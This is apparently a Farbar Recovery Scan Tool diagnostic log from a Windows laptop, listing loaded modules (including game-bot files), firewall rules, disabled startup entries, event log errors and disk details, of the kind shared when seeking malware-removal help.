        2017-03-31 16:22 - 2017-03-31 16:22 - 00110705 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\fbbc69b7ab1d29c40a805c6b0746d621\Byte.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00020587 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\5811ad0143ef4b833721b86079129a8b\Cwd.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00045163 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\791de6785dee4272f81191509a3916a3\Win32.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00024693 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\547b44fb47bb4104d54fb0610521d69a\HiRes.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00028794 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\f7d2b8d992c83a5fef49816625c82c17\Util.dll
        2017-03-24 23:49 - 2017-02-16 20:05 - 00842999 _____ () D:\Bots\Vend Oridecon\XSTools.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00036974 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\c89c5c2b62d65b506e25181740473cfb\Encode.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00024670 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\39e77646f120ab10fd580ce5547457bc\IO.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00024679 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\f6abdadf80d1a5df1c193b3555a992e5\Glob.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00102530 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\87b0c32a91693f393d3e4a7ae21581b5\Zlib.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00024676 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\976149dce8abb473f6370400bbeeb653\Fcntl.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00028785 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\b3334b0da6e9ac8826a7bcb95b759392\encoding.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00028774 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\cd1f373da56ce7952df1037c9f6ec08e\Socket.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00168030 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\4b5d489aed73c7799d111b1ef29e78d3\re.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00032888 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\a556e1815f2ed7e75af25a4aa09bc7c0\Dumper.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00024691 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\a416e864dcdf5f06c5e5c3808475f131\MD5.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00024716 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\dbecb32fee611cea5ae0f8234b695952\FastCalc.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00065642 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\1d18acbf4e8b63dcd4166d6bcf1b5dcb\Storable.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00020592 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\100d58df9126891749a3fb0f45c68549\Name.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00020596 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\ddc012f560581dc3fe7348684b23e5f2\File.dll
        2017-03-24 23:50 - 2017-03-24 23:50 - 00007182 ____N () C:\Users\ASUS\AppData\Local\Temp\wxppl-ASUS\b71b5899d6bb3a61a438d8165dd2d4fe\mingwm10.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00020590 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\5f6dcecdb4ceef3ce50f5ca4a3eb1a7c\attributes.d ll
        2017-03-31 16:22 - 2017-03-31 16:22 - 02910208 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\37d8a3ea6513473b8612cef176c99de2\Wx.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00162304 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\a3c79762244d92195f0c441ad398c938\Print.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00594944 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\b05495b4bd6578cc1295c96b7efd9c43\RichText.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00049277 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\048dac34a71ef7231b3a939779ee0544\Console.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00110705 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7812\fbbc69b7ab1d29c40a805c6b0746d621\Byte.dll
        2001-07-26 16:47 - 2001-07-26 16:47 - 00692224 _____ () D:\Program Files (x86)\BattlePing\bp\libeay32.dll
        2017-02-14 21:47 - 2002-08-09 09:38 - 00358963 _____ () D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\binkw32.dll
        2017-02-14 21:49 - 2001-03-31 08:41 - 00346624 _____ () D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\mss32.dll
        2017-02-14 21:47 - 2015-12-12 14:17 - 00052736 _____ () D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\cps.dll
        2017-02-14 21:48 - 2014-02-28 18:37 - 00073728 _____ () D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\defcps.DLL
        2017-02-14 21:49 - 2002-07-06 09:16 - 00125952 _____ () D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\Mp3dec.asi
        2017-02-14 21:49 - 2002-07-06 09:16 - 00062976 _____ () D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\Mssfast.m3d
        2017-02-14 21:49 - 2016-08-31 12:34 - 00032768 _____ () D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\data\nospam.dll
        2017-02-14 21:49 - 2016-12-23 09:48 - 00207872 _____ () D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\data\nospam2.dll
        2017-02-14 21:49 - 2015-12-12 14:17 - 00017408 _____ () D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\data\hidevend.dll
        2017-02-14 21:49 - 2015-12-12 14:17 - 00016896 _____ () D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\data\hidechat.dll
        2017-02-14 21:49 - 2015-12-12 14:17 - 00020992 _____ () D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\data\classic.enhancements.dll
        2017-02-14 21:49 - 2016-12-23 09:48 - 00013312 _____ () D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\data\party.dll

        ==================== Alternate Data Streams (Whitelisted) =========

        (If an entry is included in the fixlist, only the ADS will be removed.)

        ==================== Safe Mode (Whitelisted) ===================

        (If an entry is included in the fixlist, it will be removed from the registry. The “AlternateShell” will be restored.)

        ==================== Association (Whitelisted) ===============

        (If an entry is included in the fixlist, the registry item will be restored to default or removed.)

        ==================== Internet Explorer trusted/restricted ===============

        (If an entry is included in the fixlist, it will be removed from the registry.)

        ==================== Hosts content: ===============================

        (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

        2017-03-22 07:23 - 2017-03-22 07:23 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

        ==================== Other Areas ============================

        (Currently there is no automatic fix for this section.)

        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\Control Panel\Desktop\Wallpaper → C:\Windows\web\wallpaper\Windows\img0.jpg
        DNS Servers: 8.8.8.8 - 8.8.4.4
        HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
        Windows Firewall is enabled.

        ==================== MSCONFIG/TASK MANAGER disabled items ==

        HKLM...\StartupApproved\Run: => “cAudioFilterAgent”
        HKLM...\StartupApproved\Run: => “ShadowPlay”
        HKLM...\StartupApproved\Run: => “GratoUpdate”
        HKLM...\StartupApproved\Run: => “GratoTray”
        HKLM...\StartupApproved\Run: => “ZAM”
        HKLM...\StartupApproved\Run32: => “AdobeCS6ServiceManager”
        HKLM...\StartupApproved\Run32: => “Adobe ARM”
        HKLM...\StartupApproved\Run32: => “Razer Synapse”
        HKLM...\StartupApproved\Run32: => “Dropbox”
        HKLM...\StartupApproved\Run32: => “AdobeAAMUpdater-1.0”
        HKLM...\StartupApproved\Run32: => “gplyra”
        HKLM...\StartupApproved\Run32: => “SmartAudio”
        HKLM...\StartupApproved\Run32: => “ZAM”
        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartupApproved\Run: => “OneDrive”
        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartupApproved\Run: => “BingSvc”
        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartupApproved\Run: => “Skype”
        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartupApproved\Run: => “Spotify”
        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartupApproved\Run: => “Spotify Web Helper”
        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartupApproved\Run: => “CCleaner Monitoring”
        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartupApproved\Run: => “PPBFY9hyTL.exe”
        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartupApproved\Run: => “AdobeBridge”

        ==================== FirewallRules (Whitelisted) ===============

        (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

        FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
        FirewallRules: [{59CC498F-424C-4363-A2C3-2E1A09B6F006}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
        FirewallRules: [{36801CF8-997C-4B09-ACA7-8A026E93D36F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
        FirewallRules: [{42FB7F4C-E07D-4B78-99CF-9F5588DD9B8F}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe
        FirewallRules: [{25E3757A-E4F0-483E-82D4-685063BE2F97}] => (Allow) C:\Program Files (x86)\AVG\Av\avgmfapx.exe
        FirewallRules: [{8658E056-5782-4F1F-AA59-FE6AAB31813B}] => (Allow) C:\Program Files (x86)\AVG\Av\avgmfapx.exe
        FirewallRules: [TCP Query User{441B0C15-4DC1-4E71-B1E1-0F27B2D23213}D:\google\chrome\application\chrome.e xe] => (Allow) D:\google\chrome\application\chrome.exe
        FirewallRules: [UDP Query User{50B0B3CB-8F74-43F8-AF4C-7321812A5350}D:\google\chrome\application\chrome.e xe] => (Allow) D:\google\chrome\application\chrome.exe
        FirewallRules: [{C72B8364-6715-483B-8974-5D7A0AB30EB7}] => (Block) D:\google\chrome\application\chrome.exe
        FirewallRules: [{7E08A950-474B-46BC-A216-2D0E83D25A9C}] => (Block) D:\google\chrome\application\chrome.exe
        FirewallRules: [{16A271F3-C67F-4220-89F6-7A19C85F59F2}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
        FirewallRules: [TCP Query User{703FFCBB-95EE-4F75-998C-7A352E05E102}C:\users\asus\appdata\roaming\spotify \spotify.exe] => (Allow) C:\users\asus\appdata\roaming\spotify\spotify.exe
        FirewallRules: [UDP Query User{AB2823F0-8E64-44E3-AAFC-86B2820A352A}C:\users\asus\appdata\roaming\spotify \spotify.exe] => (Allow) C:\users\asus\appdata\roaming\spotify\spotify.exe
        FirewallRules: [{9BF533A8-FCB1-4276-A028-86D4BD87D5C5}] => (Allow) C:\Program Files (x86)\Standuck\Application\chrome.exe
        FirewallRules: [TCP Query User{2DA50AD5-C877-4669-A46F-F6176F2C7633}D:\games\gunbound\softnyxgame\gunboun dis\gunbound.gme] => (Allow) D:\games\gunbound\softnyxgame\gunboundis\gunbound. gme
        FirewallRules: [UDP Query User{44E161DA-0687-46BB-A177-90419CF86F0F}D:\games\gunbound\softnyxgame\gunboun dis\gunbound.gme] => (Allow) D:\games\gunbound\softnyxgame\gunboundis\gunbound. gme
        FirewallRules: [{B2D3A128-EE1A-4A7F-8C9F-0343D3EC09DD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
        FirewallRules: [{D6FC2505-9A7D-424C-B6E7-E5BD5D44A5F6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
        FirewallRules: [{643820FF-B6C1-450C-97F2-448BC661E774}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
        FirewallRules: [{0BCE2EE2-3B89-404C-9628-6853B93F7AEE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
        FirewallRules: [{CDE007A3-A975-464E-8CCD-B960909AB7F3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
        FirewallRules: [{0E7D0777-CF75-455C-81CF-8FC311B6CC4E}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
        FirewallRules: [{34B3ED1B-6593-49F7-9318-315F3D7E5114}] => (Allow) C:\Program Files (x86)\AVG\Av\avgnsa.exe
        FirewallRules: [{35DC1778-E4AD-4216-BEA7-0AA93AA2D506}] => (Allow) C:\Program Files (x86)\AVG\Av\avgnsa.exe
        FirewallRules: [{A811B46F-9252-402C-95A6-2A4B1951B91C}] => (Allow) C:\Program Files (x86)\AVG\Av\avgemca.exe
        FirewallRules: [{1D8934FB-A2AE-4487-8059-F69E4D163296}] => (Allow) C:\Program Files (x86)\AVG\Av\avgemca.exe
        FirewallRules: [{C434796E-8F4A-4F23-8113-8412E60EBD08}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

        ==================== Restore Points =========================

        28-03-2017 22:20:50 Removed WinSnare

        ==================== Faulty Device Manager Devices =============

        ==================== Event log errors: =========================
        [HEADING=1]Application errors:[/HEADING]
        Error: (03/31/2017 04:11:13 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
        Description: License Activation (slui.exe) failed with the following error code:
        hr=0xC004F074
        Command-line arguments:
        RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=73111121-5638-40f6-bc11-f1d7b0d64300;NotificationInterval=1440;Trigger=Use rLogon;SessionId=1

        Error: (03/31/2017 04:10:32 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
        Description: License Activation (slui.exe) failed with the following error code:
        hr=0xC004F074
        Command-line arguments:
        RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=73111121-5638-40f6-bc11-f1d7b0d64300;NotificationInterval=1440;Trigger=Net workAvailable

        Error: (03/31/2017 04:00:16 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
        Description: License Activation (slui.exe) failed with the following error code:
        hr=0xC004F074
        Command-line arguments:
        RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=73111121-5638-40f6-bc11-f1d7b0d64300;NotificationInterval=1440;Trigger=Use rLogon;SessionId=1

        Error: (03/31/2017 03:59:34 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
        Description: License Activation (slui.exe) failed with the following error code:
        hr=0xC004F074
        Command-line arguments:
        RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=73111121-5638-40f6-bc11-f1d7b0d64300;NotificationInterval=1440;Trigger=Net workAvailable

        Error: (03/31/2017 10:18:22 AM) (Source: Application Hang) (EventID: 1002) (User: )
        Description: The program chrome.exe version 56.0.2924.87 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

        Process ID: cfc

        Start Time: 01d2a95d145f0bf2

        Termination Time: 13

        Application Path: C:\Program Files (x86)\Standuck\Application\chrome.exe

        Report Id: a39afb0f-15c0-11e7-9ca5-74c63be6bd3e

        Faulting package full name:

        Faulting package-relative application ID:

        Error: (03/31/2017 08:13:19 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
        Description: License Activation (slui.exe) failed with the following error code:
        hr=0xC004F074
        Command-line arguments:
        RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=73111121-5638-40f6-bc11-f1d7b0d64300;NotificationInterval=1440;Trigger=Net workAvailable

        Error: (03/31/2017 08:12:16 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
        Description: License Activation (slui.exe) failed with the following error code:
        hr=0xC004F074
        Command-line arguments:
        RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=73111121-5638-40f6-bc11-f1d7b0d64300;NotificationInterval=1440;Trigger=Net workAvailable

        Error: (03/31/2017 08:08:22 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
        Description: License Activation (slui.exe) failed with the following error code:
        hr=0xC004F074
        Command-line arguments:
        RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=73111121-5638-40f6-bc11-f1d7b0d64300;NotificationInterval=1440;Trigger=Net workAvailable

        Error: (03/31/2017 03:39:04 AM) (Source: SideBySide) (EventID: 63) (User: )
        Description: Activation context generation failed for “d:\program files (x86)\razer\razer cortex\StreamingServicesAPI.dll.Manifest”.Error in manifest or policy file “d:\program files (x86)\razer\razer cortex\StreamingServicesAPI.dll.Manifest” on line 2.
        The value “F:\joju\projects\XSplitCSDemo\RazerLauncher\Compo nents\StreamingServicesAPI.dll” of attribute “name” in element “urn:schemas-microsoft-com:asm.v1^file” is invalid.

        Error: (03/31/2017 12:31:29 AM) (Source: Application Error) (EventID: 1000) (User: )
        Description: Faulting application name: wxstart.exe, version: 0.0.0.0, time stamp: 0x4c592cb9
        Faulting module name: wxbase28u_gcc_wxp_binary_11_6.dll, version: 2.8.11.0, time stamp: 0x4cab559f
        Exception code: 0xc0000005
        Fault offset: 0x000671d6
        Faulting process ID: 0x183c
        Faulting application start time: 0x01d2a87b6426c665
        Faulting application path: D:\Bots\Vend Oridecon\wxstart.exe
        Faulting module path: C:\Users\ASUS\AppData\Local\Temp\wxppl-ASUS\b71b5899d6bb3a61a438d8165dd2d4fe\wxbase28u_gc c_wxp_binary_11_6.dll
        Report ID: a910a4e3-a686-4100-8cf8-b408fa61d4d4
        Faulting package full name:
        Faulting package-relative application ID:
        [HEADING=1]System errors:[/HEADING]
        Error: (03/31/2017 08:08:24 PM) (Source: DCOM) (EventID: 10016) (User: MAMBA)
        Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
        {7022A3B3-D004-4F52-AF11-E9E987FEE25F}
        and APPID
        {ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
        to the user MAMBA\ASUS SID (S-1-5-21-2746278279-2939389576-4119914495-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

        Error: (03/31/2017 07:38:22 PM) (Source: DCOM) (EventID: 10016) (User: MAMBA)
        Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
        {7022A3B3-D004-4F52-AF11-E9E987FEE25F}
        and APPID
        {ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
        to the user MAMBA\ASUS SID (S-1-5-21-2746278279-2939389576-4119914495-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

        Error: (03/31/2017 07:08:25 PM) (Source: DCOM) (EventID: 10016) (User: MAMBA)
        Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
        {7022A3B3-D004-4F52-AF11-E9E987FEE25F}
        and APPID
        {ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
        to the user MAMBA\ASUS SID (S-1-5-21-2746278279-2939389576-4119914495-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

        Error: (03/31/2017 06:38:23 PM) (Source: DCOM) (EventID: 10016) (User: MAMBA)
        Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
        {7022A3B3-D004-4F52-AF11-E9E987FEE25F}
        and APPID
        {ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
        to the user MAMBA\ASUS SID (S-1-5-21-2746278279-2939389576-4119914495-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

        Error: (03/31/2017 06:08:22 PM) (Source: DCOM) (EventID: 10016) (User: MAMBA)
        Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
        {7022A3B3-D004-4F52-AF11-E9E987FEE25F}
        and APPID
        {ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
        to the user MAMBA\ASUS SID (S-1-5-21-2746278279-2939389576-4119914495-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

        Error: (03/31/2017 05:38:25 PM) (Source: DCOM) (EventID: 10016) (User: MAMBA)
        Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
        {7022A3B3-D004-4F52-AF11-E9E987FEE25F}
        and APPID
        {ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
        to the user MAMBA\ASUS SID (S-1-5-21-2746278279-2939389576-4119914495-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

        Error: (03/31/2017 05:08:22 PM) (Source: DCOM) (EventID: 10016) (User: MAMBA)
        Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
        {7022A3B3-D004-4F52-AF11-E9E987FEE25F}
        and APPID
        {ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
        to the user MAMBA\ASUS SID (S-1-5-21-2746278279-2939389576-4119914495-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

        Error: (03/31/2017 04:38:22 PM) (Source: DCOM) (EventID: 10016) (User: MAMBA)
        Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
        {7022A3B3-D004-4F52-AF11-E9E987FEE25F}
        and APPID
        {ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
        to the user MAMBA\ASUS SID (S-1-5-21-2746278279-2939389576-4119914495-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

        Error: (03/31/2017 04:11:44 PM) (Source: DCOM) (EventID: 10016) (User: MAMBA)
        Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
        {7022A3B3-D004-4F52-AF11-E9E987FEE25F}
        and APPID
        {ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
        to the user MAMBA\ASUS SID (S-1-5-21-2746278279-2939389576-4119914495-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

        Error: (03/31/2017 04:11:39 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
        Description: The ed2k idle service service failed to start due to the following error:
        The system cannot find the file specified.
        [HEADING=1]CodeIntegrity:[/HEADING]
        Date: 2017-03-31 22:10:49.157
        Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Windows\WinSxS\amd64_avg.v c140.crt_f92d94485545da78_14.0.24210.0_none_69fa01 97d9b096ae\vcruntime140.dll that did not meet the Custom 3 / Antimalware signing level requirements.

        Date: 2017-03-31 22:10:48.587
        Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Windows\WinSxS\amd64_avg.v c140.crt_f92d94485545da78_14.0.24210.0_none_69fa01 97d9b096ae\vcruntime140.dll that did not meet the Custom 3 / Antimalware signing level requirements.

        Date: 2017-03-31 22:10:47.600
        Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Windows\WinSxS\amd64_avg.v c140.crt_f92d94485545da78_14.0.24210.0_none_69fa01 97d9b096ae\vcruntime140.dll that did not meet the Custom 3 / Antimalware signing level requirements.

        Date: 2017-03-31 22:10:33.195
        Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Windows\WinSxS\amd64_avg.v c140.crt_f92d94485545da78_14.0.24210.0_none_69fa01 97d9b096ae\vcruntime140.dll that did not meet the Custom 3 / Antimalware signing level requirements.

        Date: 2017-03-31 22:10:32.555
        Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Windows\WinSxS\amd64_avg.v c140.crt_f92d94485545da78_14.0.24210.0_none_69fa01 97d9b096ae\vcruntime140.dll that did not meet the Custom 3 / Antimalware signing level requirements.

        Date: 2017-03-31 22:10:31.867
        Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Windows\WinSxS\amd64_avg.v c140.crt_f92d94485545da78_14.0.24210.0_none_69fa01 97d9b096ae\vcruntime140.dll that did not meet the Custom 3 / Antimalware signing level requirements.

        Date: 2017-03-31 22:09:59.659
        Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Windows\WinSxS\amd64_avg.v c140.crt_f92d94485545da78_14.0.24210.0_none_69fa01 97d9b096ae\vcruntime140.dll that did not meet the Custom 3 / Antimalware signing level requirements.

        Date: 2017-03-31 16:09:27.594
        Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Windows\WinSxS\amd64_avg.v c140.crt_f92d94485545da78_14.0.24210.0_none_69fa01 97d9b096ae\msvcp140.dll that did not meet the Custom 3 / Antimalware signing level requirements.

        Date: 2017-03-31 16:09:27.591
        Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Windows\WinSxS\amd64_avg.v c140.crt_f92d94485545da78_14.0.24210.0_none_69fa01 97d9b096ae\vcruntime140.dll that did not meet the Custom 3 / Antimalware signing level requirements.

        Date: 2017-03-31 16:09:27.590
        Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume2\Windows\WinSxS\amd64_avg.v c140.crt_f92d94485545da78_14.0.24210.0_none_69fa01 97d9b096ae\vcruntime140.dll that did not meet the Custom 3 / Antimalware signing level requirements.

        ==================== Memory info ===========================

        Processor: Intel(R) Core™ i5-7200U CPU @ 2.50GHz
        Percentage of memory in use: 84%
        Total physical RAM: 3979.04 MB
        Available physical RAM: 618.08 MB
        Total Virtual: 16267.04 MB
        Available Virtual: 12208.82 MB

        ==================== Drives ================================

        Drive c: () (Fixed) (Total:124.09 GB) (Free:73.71 GB) NTFS
        Drive d: () (Fixed) (Total:687.37 GB) (Free:355.96 GB) NTFS
        Drive f: (F) (Fixed) (Total:119.56 GB) (Free:119.41 GB) NTFS

        ==================== MBR & Partition Table ==================

        ================================================== ======
        Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: D89045D1)
        Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS)
        Partition 2: (Not Active) - (Size=124.1 GB) - (Type=07 NTFS)
        Partition 3: (Not Active) - (Size=119.6 GB) - (Type=OF Extended)
        Partition 4: (Not Active) - (Size=687.4 GB) - (Type=07 NTFS)

        ==================== End of Addition.txt ============================

        Users shortcut scan result (x64) Version: 15-03-2017
        Ran by ASUS (01-04-2017 00:18:24)
        Running from C:\Users\ASUS\Desktop
        Boot Mode: Normal

        ==================== Shortcuts =============================

        (The entries could be listed to be restored or removed.)

        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\01 - File Explorer.lnk → C:\Windows\explorer.exe (Microsoft Corporation)
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\03 - Documents.lnk → C:\Users\ASUS\Documents ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\04 - Downloads.lnk → C:\Users\ASUS\Downloads ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\05 - Music.lnk → C:\Users\ASUS\Music ()
        Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\06 - Pictures.lnk → C:\Users\ASUS\Pictures ()
